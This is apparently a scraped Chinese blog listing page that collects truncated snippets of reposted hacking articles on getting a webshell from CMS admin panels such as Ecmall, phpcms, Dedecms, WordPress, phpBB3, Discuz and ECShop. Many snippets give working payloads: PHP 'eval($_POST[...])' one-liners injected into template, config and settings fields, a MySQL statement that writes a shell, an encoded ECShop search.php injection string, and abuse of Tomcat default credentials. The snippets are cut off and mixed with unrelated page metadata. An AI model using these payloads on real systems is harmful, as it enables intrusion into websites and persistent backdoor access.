进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时
原创
2011-05-21 12:03:30
1659阅读
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS
翻译
精选
2013-06-21 11:09:57
1503阅读
http://www.xxx.com/admin.php?mod=phpcms&file=safe&action=see_code&files=test.php
直接在文件源代码里写入木马后,点修改就可以了,test.php马就在根目录下了
转载
精选
2010-12-27 23:38:35
829阅读
有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html
/admin 目录下的利用:Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/g
转载
2010-03-24 18:12:54
585阅读
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!
今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞
转载
精选
2011-02-08 21:01:10
752阅读
我记得以前看过这个资料,千翻万找总算翻了出来。
这个前提是可以编辑模板,不然我估计是没什么希望了。
templates/default/actions.lang.php(以这个为例)
在最底那提交
游客\');?>
\'g\'=>\'sdfsdf
便能写入一句话木马并正常执行.
原创
2007-12-08 15:38:00
1914阅读
1. dedecms方法 文件上传(分为图片上传或者文件管理器上传) 文件包含漏洞,在模块管理中将一句话插入到html的文件中(优先为文件主页) 也可以在核心设置中插入一句话,从而将一句话插入到data\config.cache.inc.php中。 2. 帝国cms方法(mpirecms) 该cms ...
转载
2021-08-19 13:41:00
574阅读
2评论
来自t00ls
不是0day,只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content\themes\wa
转载
精选
2010-12-18 12:21:47
1856阅读
内容:
phpbb3 拿到管理员账号进去能干什么呢?又不能上传个SHELL。确实很头疼啊
搜半天都没搜到有牛人拿到过。难道没人研究它?
去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。
要是能找到执行类似phpmyadmin之类的执行数据库语句的地方。拿shell还是比较简单的
需要两条语句。还有绝对路径。。如下
INSERT INTO phpbb
转载
2011-08-05 23:34:53
1523阅读
1.final 不能被子类改写,不可扩展2.私有不能被继承3.构造方法,第一个被调用的方法4.static访问 类名::方法名 parent::test();这里test可以不静态m=模块名&c=控制器&a=方法5.主入口文件 6.与system.php在同一个目录下的一个route.php指定默...
转载
2014-12-29 16:15:00
137阅读
2评论
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_
转载
精选
2008-01-29 16:43:00
521阅读
点模版管理-自定也页面-增加自定义页面 文件格式为.php 内容可以是一句话 可以是大马。。然后保存 在点管理自定义页面 找到你刚才那个 直接点页面名字,就可以访问。
转载
精选
2010-12-10 10:47:01
429阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-12-28 22:33:49
612阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-07-10 21:04:00
3740阅读
author:meao
www.secmao.tk 转载请注明
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\
管理员邮箱:''''''''''''''<?php eval($_POST[cmd])?>
转载
精选
2010-07-15 21:36:20
3875阅读
后台-扩展-菜单管理,选择在哪里添加菜单,然后填写模块名,文件名,方法名即可,参考系统默认的写法,如管理内容模块名为content,文件名是content.php,方法名是init,则调用的是 phpcms\modules\content\content.php中的init()方法,在content.php中function add() { }//对应的是content_add.tpl.php模板
原创
2023-08-25 10:41:43
114阅读
这个是search.php exp 变种
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uI
转载
精选
2011-01-21 19:09:59
3072阅读
飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp
转载
精选
2009-09-24 02:19:02
2174阅读
点赞
